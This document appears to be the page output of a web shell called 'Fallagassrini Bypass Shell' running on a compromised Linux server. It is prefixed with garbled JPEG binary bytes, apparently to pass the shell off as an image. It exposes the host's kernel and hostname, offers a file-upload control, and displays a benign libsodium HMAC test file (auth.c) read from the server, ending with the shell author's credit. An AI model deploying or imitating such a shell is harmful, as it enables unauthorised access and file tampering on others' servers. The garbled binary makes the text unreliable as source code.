JFIF;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 85 C  !"$"$C$^" }!1AQa"q2#BR$3br %&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz w!1AQaq"2B #3Rbr $4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz ? C^",k8`98?þ. s$ֱ$Xw_Z¿2b978%Q}s\ŴqXxzK1\@N2<JY{lF/Z=N[xrB}FJۨ<yǽw 5o۹^s(!fF*zn5`Z}Ҋ">Ir{_+<$$C_UC)^r25d:(c⣕U .fpSnFe\Ӱ.չ8# m=8iO^)R=^*_:M3x8k>(yDNYҵ/v-]WZ}h[*'ym&e`Xg>%̲yk߆՞Kwwrd󞼎 r;M<[AC¤ozʪ+h%BJcd`*ǎVz%6}G;mcՊ~b_aaiiE4jPLU<Ɗvg?q~!vc DpA/m|=-nux^Hޔ|mt&^ 唉KH?񯣾 ^]G\4#r qRRGV!i~眦]Ay6O#gm&;UV BH ~Y8( J4{U| 14%v0?6#{t񦊊#+{E8v??c9R]^Q,h#i[Y'Š+xY佑VR{ec1%|]p=Vԡʺ9rOZY L(^*;O'ƑYxQdݵq~5_uk{yH$HZ(3 )~G Fallagassrini

Fallagassrini Bypass Shell

echo"
Fallagassrini
";
Current Path : /usr/share/doc/libsodium-devel-1.0.18/

Linux server.meentosys.com 3.10.0-1160.105.1.el7.x86_64 #1 SMP Thu Dec 7 15:39:45 UTC 2023 x86_64
Upload File :
Current File : //usr/share/doc/libsodium-devel-1.0.18/auth.c

#define TEST_NAME "auth"
#include "cmptest.h"

/* "Test Case 2" from RFC 4231 */
static unsigned char key[32] = "Jefe";
static unsigned char c[]     = "what do ya want for nothing?";

/* Hacker manifesto */
static unsigned char key2[] =
    "Another one got caught today, it's all over the papers. \"Teenager "
    "Arrested in Computer Crime Scandal\", \"Hacker Arrested after Bank "
    "Tampering\"... Damn kids. They're all alike.";

static unsigned char a[crypto_auth_BYTES];
static unsigned char a2[crypto_auth_hmacsha512_BYTES];
static unsigned char a3[crypto_auth_hmacsha512_BYTES];

int
main(void)
{
    crypto_auth_hmacsha512_state st;
    crypto_auth_hmacsha256_state st256;
    crypto_auth_hmacsha512256_state st512_256;
    size_t                       i;

    assert(crypto_auth_hmacsha512_statebytes() ==
           sizeof(crypto_auth_hmacsha512_state));
    crypto_auth(a, c, sizeof c - 1U, key);
    for (i = 0; i < sizeof a; ++i) {
        printf(",0x%02x", (unsigned int) a[i]);
        if (i % 8 == 7)
            printf("\n");
    }
    printf("\n");

    crypto_auth_hmacsha512_init(&st, key, sizeof key);
    crypto_auth_hmacsha512_update(&st, c, 1U);
    crypto_auth_hmacsha512_update(&st, c, sizeof c - 2U);
    crypto_auth_hmacsha512_final(&st, a2);
    for (i = 0; i < sizeof a2; ++i) {
        printf(",0x%02x", (unsigned int) a2[i]);
        if (i % 8 == 7)
            printf("\n");
    }
    printf("\n");

    crypto_auth_hmacsha512_init(&st, key2, sizeof key2);
    crypto_auth_hmacsha512_update(&st, c, 1U);
    crypto_auth_hmacsha512_update(&st, c, sizeof c - 2U);
    crypto_auth_hmacsha512_final(&st, a2);
    for (i = 0; i < sizeof a2; ++i) {
        printf(",0x%02x", (unsigned int) a2[i]);
        if (i % 8 == 7)
            printf("\n");
    }

    memset(a2, 0, sizeof a2);
    crypto_auth_hmacsha256_init(&st256, key2, sizeof key2);
    crypto_auth_hmacsha256_update(&st256, guard_page, 0U);
    crypto_auth_hmacsha256_update(&st256, c, 1U);
    crypto_auth_hmacsha256_update(&st256, c, sizeof c - 2U);
    crypto_auth_hmacsha256_final(&st256, a2);
    for (i = 0; i < sizeof a2; ++i) {
        printf(",0x%02x", (unsigned int) a2[i]);
        if (i % 8 == 7)
            printf("\n");
    }

    /* Empty message tests: HMAC-SHA512 */
    memset(a2, 0, sizeof a2);
    crypto_auth_hmacsha512_init(&st, key, sizeof key);
    crypto_auth_hmacsha512_final(&st, a2);

    memset(a3, 0, sizeof a3);
    crypto_auth_hmacsha512_init(&st, key, sizeof key);
    crypto_auth_hmacsha512_update(&st, a2, 0U);
    crypto_auth_hmacsha512_final(&st, a3);
    assert(sodium_memcmp(a2, a3, sizeof a2) == 0);

    memset(a3, 0, sizeof a3);
    crypto_auth_hmacsha512_init(&st, key, sizeof key);
    crypto_auth_hmacsha512_update(&st, guard_page, 0U);
    crypto_auth_hmacsha512_final(&st, a3);
    assert(sodium_memcmp(a2, a3, sizeof a2) == 0);

    /* Empty message tests: HMAC-SHA512-256 */
    memset(a2, 0, sizeof a2);
    crypto_auth_hmacsha512256_init(&st512_256, key, sizeof key);
    crypto_auth_hmacsha512256_final(&st512_256, a2);

    memset(a3, 0, sizeof a3);
    crypto_auth_hmacsha512256_init(&st512_256, key, sizeof key);
    crypto_auth_hmacsha512256_update(&st512_256, a2, 0U);
    crypto_auth_hmacsha512256_final(&st512_256, a3);
    assert(sodium_memcmp(a2, a3, sizeof a2) == 0);

    memset(a3, 0, sizeof a3);
    crypto_auth_hmacsha512256_init(&st512_256, key, sizeof key);
    crypto_auth_hmacsha512256_update(&st512_256, guard_page, 0U);
    crypto_auth_hmacsha512256_final(&st512_256, a3);
    assert(sodium_memcmp(a2, a3, sizeof a2) == 0);

    /* Empty message tests: HMAC-SHA256 */

    memset(a2, 0, sizeof a2);
    crypto_auth_hmacsha256_init(&st256, key, sizeof key);
    crypto_auth_hmacsha256_final(&st256, a2);

    memset(a3, 0, sizeof a3);
    crypto_auth_hmacsha256_init(&st256, key, sizeof key);
    crypto_auth_hmacsha256_update(&st256, a2, 0U);
    crypto_auth_hmacsha256_final(&st256, a3);
    assert(sodium_memcmp(a2, a3, sizeof a2) == 0);

    memset(a3, 0, sizeof a3);
    crypto_auth_hmacsha256_init(&st256, key, sizeof key);
    crypto_auth_hmacsha256_update(&st256, guard_page, 0U);
    crypto_auth_hmacsha256_final(&st256, a3);
    assert(sodium_memcmp(a2, a3, sizeof a2) == 0);

    /* --- */

    assert(crypto_auth_bytes() > 0U);
    assert(crypto_auth_keybytes() > 0U);
    assert(strcmp(crypto_auth_primitive(), "hmacsha512256") == 0);
    assert(crypto_auth_hmacsha256_bytes() > 0U);
    assert(crypto_auth_hmacsha256_keybytes() > 0U);
    assert(crypto_auth_hmacsha512_bytes() > 0U);
    assert(crypto_auth_hmacsha512_keybytes() > 0U);
    assert(crypto_auth_hmacsha512256_bytes() == crypto_auth_bytes());
    assert(crypto_auth_hmacsha512256_keybytes() == crypto_auth_keybytes());
    assert(crypto_auth_hmacsha512256_statebytes() >=
           crypto_auth_hmacsha512256_keybytes());
    assert(crypto_auth_hmacsha256_statebytes() ==
           sizeof(crypto_auth_hmacsha256_state));
    assert(crypto_auth_hmacsha512_statebytes() ==
           sizeof(crypto_auth_hmacsha512_state));

    return 0;
}

bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net